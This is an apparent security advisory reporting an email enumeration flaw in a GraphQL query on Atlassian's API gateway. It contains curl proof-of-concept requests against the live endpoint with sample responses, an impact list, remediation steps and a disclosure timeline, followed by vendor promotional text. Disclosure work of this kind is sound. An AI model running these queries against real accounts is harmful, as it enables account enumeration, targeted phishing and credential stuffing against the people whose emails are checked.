# CVE-2026-XXXX: Atlassian Central GraphQL — Email Enumeration Oracle
## Product
**Atlassian Central GraphQL Gateway** (`api.atlassian.com/graphql`)
## Vulnerability Type
**CWE-204: Observable Response Discrepancy** — Email Enumeration Oracle
## Severity
**MEDIUM** — CVSS 5.3 `AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`
## Description
The `loomUnauthenticated_primaryAuthTypeForEmail` GraphQL query on Atlassian's central GraphQL gateway returns different responses depending on whether an email address is registered with Atlassian, allowing unauthenticated user enumeration.
**Registered email** → returns `authType` (e.g. `workos`, `password`, `google`) and a redirect URI
**Unregistered email** → returns `authType: "none"` with no redirect URI
No authentication is required. The query name includes "Unauthenticated" — it's intentionally public, but it shouldn't leak whether an arbitrary email has an Atlassian account.
## Affected Versions
- Atlassian Central GraphQL Gateway (snapshot 37157, build 2026-07-02)
- Endpoint: `https://api.atlassian.com/graphql`
## Proof of Concept
### Registered email (returns auth provider):
```bash
curl -s "https://api.atlassian.com/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType hasActiveMemberships redirectUri } }"}'
```
Response:
```json
{
"data": {
"loomUnauthenticated_primaryAuthTypeForEmail": {
"authType": "workos",
"hasActiveMemberships": false,
"redirectUri": "https://www.loom.com/api/auth/workos?email=admin%40atlassian.com"
}
}
}
```
### Unregistered email (returns none):
```bash
curl -s "https://api.atlassian.com/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType } }"}'
```
Response:
```json
{
"data": {
"loomUnauthenticated_primaryAuthTypeForEmail": {
"authType": "none"
}
}
}
```
### Also leaks: email → auth provider mapping
`authType: "workos"` confirms the email uses WorkOS SSO. `authType: "google"` or `authType: "password"` would leak auth method. This enables targeted phishing.
## Impact
An unauthenticated attacker can:
- Enumerate registered Atlassian/Loom accounts at scale
- Map emails to their authentication provider (Google SSO, WorkOS, password)
- Use auth provider information for targeted phishing campaigns
- Build lists of valid Atlassian users for credential stuffing
## Root Cause
The `loomUnauthenticated_primaryAuthTypeForEmail` query performs no rate-limiting and returns auth provider information for any email without authentication. While the endpoint is intentionally unauthenticated (for Loom's signup flow), it leaks whether an email has an account and which auth provider they use.
## Remediation
1. Add rate-limiting to prevent bulk enumeration
2. Return a consistent response for both registered and unregistered emails
3. OR: require a CAPTCHA/nonce before querying email status
## What This Is NOT
After thorough testing, these claims were **invalidated**:
- ❌ No JWT token with privileges (tokens have `aaid: "unidentified"`)
- ❌ No admin mutation execution (all fail with `ValidationError`)
- ❌ No authentication bypass (gateway correctly identifies caller as `unidentified`)
- ❌ No data leakage beyond email/auth-provider mapping
## Timeline
- **2026-06-30:** Discovered
- **2026-06-30:** Reported to [email protected]
- **2026-07-02:** Corrected assessment — downgraded from Critical (9.8) to Medium (5.3)
## Discovered By
Wh4l3XData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation